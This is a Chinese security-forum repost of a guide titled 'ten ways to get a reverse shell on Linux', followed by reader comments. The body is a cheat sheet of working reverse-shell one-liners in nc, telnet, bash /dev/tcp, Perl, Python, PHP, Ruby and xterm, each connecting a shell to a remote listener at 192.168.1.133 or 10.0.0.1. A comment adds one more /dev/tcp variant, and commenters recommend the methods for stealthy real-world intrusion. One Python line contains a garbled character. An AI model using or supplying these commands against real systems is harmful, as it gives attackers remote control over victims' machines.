Linux下反弹的10种方法
转载的自Kaotic Creations,http://kaoticcreations.blogspot.kr/2012/01/bind-back-connect-reference-guide.html
方法1.
SHELL执行: nc 192.168.1.133 8080 -e /bin/bash
监听执行 :nc -n -vv -l -p 8080
方法2:
SHELL执行:mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
监听执行: nc -n -vv -l -p 8080
方法3:
SHELL执行:mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
监听执行:nc -n -vv -l -p 8080
方法4:
SHELL执行:
telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
监听执行:
nc -n -vv -l -p 8888
方法5:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
方法6:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
方法7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec?t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
方法8:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
方法9:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
方法10:
xterm -display 10.0.0.1:1
评论22次
bash弹shell的方式最隐蔽,同时推荐一个webtunnel,相对比较隐蔽的方式,适合实战渗透中使用
内容丰富,遇到linuxxi统需要反弹的,试了常用的两三条不行。上面的每条都可以试试下,谢谢分享
哈哈,这个路子多了
一般都用nc来进行反弹,又多了几个思路呀
看看怎么样:).
这个太好了,反弹一直就是头疼,楼主分享的方法很多。感谢。
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 这个是我最常用的..
学xi了。
mark下,待有时间测试下。我学xi的还太少啊,看前辈们的评论看到lz的文章都比较熟悉。
表示看过此文章,应该比较早的了
刚好最近在玩Linux的东西,收藏
好文章不错,收藏了。
@fjhgx 好久不见你了
不错,这下路又多了
这是封号季来了所以就转载个帖子水一下吗?
贴一个 常用的 c反弹的
《各种环境下的渗透测试》这篇写的也很好哟 http://drops.wooyun.org/tips/411
看了 下源码,“找到切入点后,首先是要弹个shell,一般我用back.py”这个思路很赞,很不错,多谢分享,兄弟
:-)一看这篇文章就特熟悉,如果最近在学xilinux渗透的话,wooyun drop和91ri,有这类的文章,lz可以多看看之后再总结一篇说不定就攒出精华帖了。。
《各种环境下的渗透测试》这篇写的也很好哟 http://drops.wooyun.org/tips/411
看了 下源码,“找到切入点后,首先是要弹个shell,一般我用back.py” 这个思路很赞,很不错,多谢分享,兄弟
不好意思,好像漏了条 :( 啊哈哈哈,我贴出来原帖地址了嘛。
大兄弟,我看原文内容好像是有11种方法啊 3. Don’t have NETCAT, then try the /dev/tcp socket method TARGET: /bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1 ATTACKER: nc -n -vv -l -p 8080